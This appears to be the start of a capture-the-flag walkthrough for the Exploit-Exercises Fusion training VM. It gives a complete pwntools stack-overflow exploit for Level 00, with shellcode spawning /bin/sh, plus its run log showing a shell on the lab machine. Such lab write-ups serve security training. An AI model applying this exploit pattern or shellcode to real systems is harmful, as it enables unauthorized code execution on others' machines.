Exploit-Exercise_Fusion全攻略+解析

目前进度:

  • Level 00
  • Level 01
  • Level 02
  • Level 03
  • Level 04
  • Level 05
  • Level 06
  • Level 07
  • Level 08
  • Level 09
  • Level 10
  • Level 11
  • Level 12
  • Level 13
  • Level 14

Level 00

#!/usr/bin/python
from pwn import *
import struct

# Fusion level00 walkthrough script: a stack buffer overflow in the level's
# HTTP request handling, run against a lab VM. Python 2 syntax (print
# statement, byte-valued str literals).
#
# NOTE(review): returning into stack data only works while the stack is
# executable and the saved return address is unprotected. A non-executable
# stack (NX), stack canaries, and removing the address disclosure in the
# banner each break this chain.

# 32-bit Linux execve("/bin/sh", NULL, NULL) via int 0x80 (al = 0x0b).
# "/sh\0" is produced with a mov/and pair so the payload carries no NUL byte.
shellcode = '\xb8\x2f\x73\x68\xf0\x25\xff\xff\xff\x0f\x50\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\xb0\x0b\x31\xc9\x31\xd2\xcd\x80'
# HTTP request framing placed around the oversized path.
prefix='GET '
postfix=' HTTP/1.1' 

r=remote('192.168.116.150', 20000)
# The service prints a buffer address before reading the request; the rest of
# the script depends on that disclosure. Consume output up to the marker.
r.recvuntil('er is at')
# Parse the hex address that follows the marker. The 11-byte slice is
# presumably a leading space plus "0x" and 8 hex digits (int() ignores the
# space). Assumes the whole value arrives in one recv() -- TODO confirm.
addr=int(r.recv()[0:11],16)
#print addr,hex(addr)
# Debug output: the value that is written into the request as the new return
# address.
print hex(addr+200)
# Request layout: 'GET ' + 139 filler bytes + p32(addr+200) + ' HTTP/1.1'
# + 100 NOPs + shellcode. The 139 filler bytes presumably reach the saved
# return address -- verify against the level's source. The first four parts
# total 156 bytes, so the NOPs cover offsets 156-255 and addr+200 falls inside
# them if addr is the start of the buffer holding the request -- TODO confirm.
r.sendline(prefix+'G'*139+p32(addr+200)+postfix+'\x90'*100+shellcode)
# Hand the connection to the terminal for interactive use.
r.interactive()
root@kali:~/Documents/Fusion# ./level00.py 
[+] Opening connection to 192.168.116.150 on port 20000: Done
0xbffff9c0
[*] Switching to interactive mode
$ id
uid=20000 gid=20000 groups=20000